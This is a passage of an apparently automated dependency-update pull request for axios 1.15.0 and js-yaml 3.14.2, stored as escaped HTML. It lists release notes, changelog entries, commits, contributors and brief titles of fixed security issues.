href=\"https://redirect.github.com/axios/axios/issues/10619\"\u003e#10619\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10627\"\u003e#10627\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10637\"\u003e#10637\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10666\"\u003e#10666\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependencies:\u003c/strong\u003e Bumped \u003ccode\u003eserialize-javascript\u003c/code\u003e, \u003ccode\u003ehandlebars\u003c/code\u003e, \u003ccode\u003epicomatch\u003c/code\u003e, \u003ccode\u003evite\u003c/code\u003e, and \u003ccode\u003edenoland/setup-deno\u003c/code\u003e to latest versions. Added a 7-day Dependabot cooldown period. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10574\"\u003e#10574\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10572\"\u003e#10572\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10568\"\u003e#10568\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10663\"\u003e#10663\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10664\"\u003e#10664\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10665\"\u003e#10665\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10669\"\u003e#10669\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10670\"\u003e#10670\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10616\"\u003e#10616\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation:\u003c/strong\u003e Unified docs, improved \u003ccode\u003ebeforeRedirect\u003c/code\u003e credential leakage example, clarified \u003ccode\u003ewithCredentials\u003c/code\u003e/\u003ccode\u003ewithXSRFToken\u003c/code\u003e behaviour, HTTP/2 support notes, async/await timeout error handling, header case preservation, and various typo fixes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10649\"\u003e#10649\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10624\"\u003e#10624\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7452\"\u003e#7452\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7471\"\u003e#7471\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10654\"\u003e#10654\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10644\"\u003e#10644\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10589\"\u003e#10589\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHousekeeping:\u003c/strong\u003e Removed stale files, regenerated lockfile, and updated sponsor scripts and blocks. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10584\"\u003e#10584\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10650\"\u003e#10650\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10582\"\u003e#10582\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10640\"\u003e#10640\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10659\"\u003e#10659\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10668\"\u003e#10668\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTests:\u003c/strong\u003e Added regression coverage for urlencoded \u003ccode\u003eContent-Type\u003c/code\u003e casing. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10573\"\u003e#10573\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve Axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/raashish1601\"\u003e\u003ccode\u003e@​raashish1601\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10573\"\u003e#10573\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/Kilros0817\"\u003e\u003ccode\u003e@​Kilros0817\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10625\"\u003e#10625\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/ashstrc\"\u003e\u003ccode\u003e@​ashstrc\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10624\"\u003e#10624\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/Abhi3975\"\u003e\u003ccode\u003e@​Abhi3975\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10589\"\u003e#10589\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/theamodhshetty\"\u003e\u003ccode\u003e@​theamodhshetty\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7452\"\u003e#7452\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.14.0\u003c/h2\u003e\n\u003cp\u003eThis release focuses on compatibility fixes, adapter stability improvements, and test/tooling modernisation.\u003c/p\u003e\n\u003ch2\u003e⚠️ Important Changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBreaking Changes:\u003c/strong\u003e None identified in this release.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAction Required:\u003c/strong\u003e If you rely on env-based proxy behaviour or CJS resolution edge-cases, validate your integration after upgrade (notably \u003ccode\u003eproxy-from-env\u003c/code\u003e v2 alignment and \u003ccode\u003emain\u003c/code\u003e entry compatibility fix).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRuntime Features:\u003c/strong\u003e No new end-user features were introduced in this release.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTest Coverage Expansion:\u003c/strong\u003e Added broader smoke/module test coverage for CJS and ESM package usage. (\u003ca href=\"https://redirect.github.com/axios/axios/pull/7510\"\u003e#7510\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHeaders:\u003c/strong\u003e Trim trailing CRLF in normalised header values. (\u003ca href=\"https://redirect.github.com/axios/axios/pull/7456\"\u003e#7456\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP/2:\u003c/strong\u003e Close detached HTTP/2 sessions on timeout to avoid lingering sessions. (\u003ca href=\"https://redirect.github.com/axios/axios/pull/7457\"\u003e#7457\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFetch Adapter:\u003c/strong\u003e Cancel \u003ccode\u003eReadableStream\u003c/code\u003e created during request-stream capability probing to prevent async resource leaks. (\u003ca href=\"https://redirect.github.com/axios/axios/pull/7515\"\u003e#7515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy Handling:\u003c/strong\u003e Fixed env proxy behavior with \u003ccode\u003eproxy-from-env\u003c/code\u003e v2 usage. (\u003ca href=\"https://redirect.github.com/axios/axios/pull/7499\"\u003e#7499\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.13.2...v1.13.3\"\u003e1.13.3\u003c/a\u003e (2026-01-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ehttp2:\u003c/strong\u003e Use port 443 for HTTPS connections by default. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7256\"\u003e#7256\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/d7e60653460480ffacecf85383012ca1baa6263e\"\u003ed7e6065\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einterceptor:\u003c/strong\u003e handle the error in the same interceptor (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6269\"\u003e#6269\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/5945e40bb171d4ac4fc195df276cf952244f0f89\"\u003e5945e40\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emain field in package.json should correspond to cjs artifacts (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5756\"\u003e#5756\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/7373fbff24cd92ce650d99ff6f7fe08c2e2a0a04\"\u003e7373fbf\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003epackage.json:\u003c/strong\u003e add 'bun' package.json 'exports' condition. Load the Node.js build in Bun instead of the browser build (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5754\"\u003e#5754\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/b89217e3e91de17a3d55e2b8f39ceb0e9d8aeda8\"\u003eb89217e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esilentJSONParsing=false should throw on invalid JSON (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7253\"\u003e#7253\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7257\"\u003e#7257\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/7d19335e43d6754a1a9a66e424f7f7da259895bf\"\u003e7d19335\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eturn AxiosError into a native error (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5394\"\u003e#5394\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5558\"\u003e#5558\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/1c6a86dd2c0623ee1af043a8491dbc96d40e883b\"\u003e1c6a86d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e add handlers to AxiosInterceptorManager interface (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5551\"\u003e#5551\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/8d1271b49fc226ed7defd07cd577bd69a55bb13a\"\u003e8d1271b\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e restore AxiosError.cause type from unknown to Error (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7327\"\u003e#7327\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/d8233d9e8e9a64bfba9bbe01d475ba417510b82b\"\u003ed8233d9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eunclear error message is thrown when specifying an empty proxy authorization (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6314\"\u003e#6314\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/6ef867e684adf7fb2343e3b29a79078a3c76dc29\"\u003e6ef867e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003eundefined\u003c/code\u003e as a value in AxiosRequestConfig (\u003ca href=\"https://redirect.github.com/axios/axios/issues/5560\"\u003e#5560\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/095033c626895ecdcda2288050b63dcf948db3bd\"\u003e095033c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eadd automatic minor and patch upgrades to dependabot (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6053\"\u003e#6053\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/65a7584eda6164980ddb8cf5372f0afa2a04c1ed\"\u003e65a7584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eadd Node.js coverage script using c8 (closes \u003ca href=\"https://redirect.github.com/axios/axios/issues/7289\"\u003e#7289\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7294\"\u003e#7294\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/ec9d94e9f88da13e9219acadf65061fb38ce080a\"\u003eec9d94e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eadded copilot instructions (\u003ca href=\"https://github.com/axios/axios/commit/3f83143bfe617eec17f9d7dcf8bafafeeae74c26\"\u003e3f83143\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with frozen prototypes (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6265\"\u003e#6265\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/860e03396a536e9b926dacb6570732489c9d7012\"\u003e860e033\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eenhance pipeFileToResponse with error handling (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7169\"\u003e#7169\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/88d78842541610692a04282233933d078a8a2552\"\u003e88d7884\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e Intellisense for string literals in a widened union (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6134\"\u003e#6134\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/f73474d02c5aa957b2daeecee65508557fd3c6e5\"\u003ef73474d\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com//redirect.github.com/microsoft/TypeScript/issues/33471/issues/issuecomment-1376364329\"\u003emicrosoft/TypeScript#33471\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eReverts\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRevert \u0026quot;fix: silentJSONParsing=false should throw on invalid JSON (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7253\"\u003e#7253\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7\"\u003e#7\u003c/a\u003e…\u0026quot; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7298\"\u003e#7298\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/a4230f5581b3f58b6ff531b6dbac377a4fd7942a\"\u003ea4230f5\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/axios/axios/issues/7253\"\u003e#7253\u003c/a\u003e \u003ca href=\"https://redirect.github.com/axios/axios/issues/7\"\u003e#7\u003c/a\u003e \u003ca href=\"https://redirect.github.com/axios/axios/issues/7298\"\u003e#7298\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e bump peter-evans/create-pull-request from 7 to 8 in the github-actions group (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7334\"\u003e#7334\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/2d6ad5e48bd29b0b2b5e7e95fb473df98301543a\"\u003e2d6ad5e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/ashvin2005\" title=\"+1752/-4 ([#7218](https://github.com/axios/axios/issues/7218) [#7218](https://github.com/axios/axios/issues/7218) )\"\u003eAshvin Tiwari\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/mochinikunj\" title=\"+940/-12 ([#7294](https://github.com/axios/axios/issues/7294) [#7294](https://github.com/axios/axios/issues/7294) )\"\u003eNikunj Mochi\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/imanchalsingh\" title=\"+544/-102 ([#7169](https://github.com/axios/axios/issues/7169) [#7185](https://github.com/axios/axios/issues/7185) )\"\u003eAnchal Singh\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/jasonsaayman\" title=\"+317/-73 ([#7334](https://github.com/axios/axios/issues/7334) [#7298](https://github.com/axios/axios/issues/7298) )\"\u003ejasonsaayman\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/brodo\" title=\"+99/-120 ([#5558](https://github.com/axios/axios/issues/5558) )\"\u003eJulian Dax\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/AKASHDHARDUBEY\" title=\"+167/-0 ([#7287](https://github.com/axios/axios/issues/7287) [#7288](https://github.com/axios/axios/issues/7288) )\"\u003eAkash Dhar Dubey\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/madhumitaaa\" title=\"+20/-68 ([#7198](https://github.com/axios/axios/issues/7198) )\"\u003eMadhumita\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/Tackoil\" title=\"+80/-2 ([#6269](https://github.com/axios/axios/issues/6269) )\"\u003eTackoil\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/justindhillon\" title=\"+41/-41 ([#6324](https://github.com/axios/axios/issues/6324) [#6315](https://github.com/axios/axios/issues/6315) )\"\u003eJustin Dhillon\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/Rudrxxx\" title=\"+71/-2 ([#7257](https://github.com/axios/axios/issues/7257) )\"\u003eRudransh\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/WuMingDao\" title=\"+36/-36 ([#7215](https://github.com/axios/axios/issues/7215) )\"\u003eWuMingDao\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/codenomnom\" title=\"+70/-0 ([#7201](https://github.com/axios/axios/issues/7201) [#7201](https://github.com/axios/axios/issues/7201) )\"\u003ecodenomnom\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/Nandann018-ux\" title=\"+60/-10 ([#7272](https://github.com/axios/axios/issues/7272) )\"\u003eNandan Acharya\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/KernelDeimos\" title=\"+22/-40 ([#7042](https://github.com/axios/axios/issues/7042) )\"\u003eEric Dubé\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/tiborpilz\" title=\"+40/-4 ([#5551](https://github.com/axios/axios/issues/5551) )\"\u003eTibor Pilz\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/joaoGabriel55\" title=\"+31/-4 ([#6314](https://github.com/axios/axios/issues/6314) )\"\u003eGabriel Quaresma\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003c!-- raw HTML omitted --\u003e \u003ca href=\"https://github.com/turadg\" title=\"+23/-6 ([#6265](https://github.com/axios/axios/issues/6265) )\"\u003eTuradg Aleahmad\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/772a4e54ecc4cc2421e2b746daff0aca10f359d7\"\u003e\u003ccode\u003e772a4e5\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.15.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10671\"\u003e#10671\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/4b071371be2f810b4bc7797a13838e0f806ebb22\"\u003e\u003ccode\u003e4b07137\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump vite from 8.0.0 to 8.0.5 in /tests/smoke/esm (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10663\"\u003e#10663\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/51e57b39db251bfe3d34af5c943dfea18e06c8b6\"\u003e\u003ccode\u003e51e57b3\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump vite from 8.0.2 to 8.0.5 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10664\"\u003e#10664\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/fba1a77930f0c459677b729161627234b88c90aa\"\u003e\u003ccode\u003efba1a77\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump vite from 8.0.2 to 8.0.5 in /tests/module/esm (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10665\"\u003e#10665\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/0bf6e28eac86e87da2b60bbf5ea4237910e1a08e\"\u003e\u003ccode\u003e0bf6e28\u003c/code\u003e\u003c/a\u003e chore(deps): bump denoland/setup-deno in the github-actions group (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10669\"\u003e#10669\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/8107157c572ee4a54cb28c01ab7f7f3d895ba661\"\u003e\u003ccode\u003e8107157\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the development_dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10670\"\u003e#10670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/e66530e3302d56176befd0778155dafea2487542\"\u003e\u003ccode\u003ee66530e\u003c/code\u003e\u003c/a\u003e ci: require npm-publish environment for releases (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10666\"\u003e#10666\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/49f23cbfe4d308a075281c5f798d4c68f648cbe2\"\u003e\u003ccode\u003e49f23cb\u003c/code\u003e\u003c/a\u003e chore(sponsor): update sponsor block (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10668\"\u003e#10668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1\"\u003e\u003ccode\u003e3631854\u003c/code\u003e\u003c/a\u003e fix: unrestricted cloud metadata exfiltration via header injection chain (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10\"\u003e#10\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df\"\u003e\u003ccode\u003efb3befb\u003c/code\u003e\u003c/a\u003e fix: no_proxy hostname normalization bypass leads to ssrf (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10661\"\u003e#10661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v0.23.0...v1.15.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for axios since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by 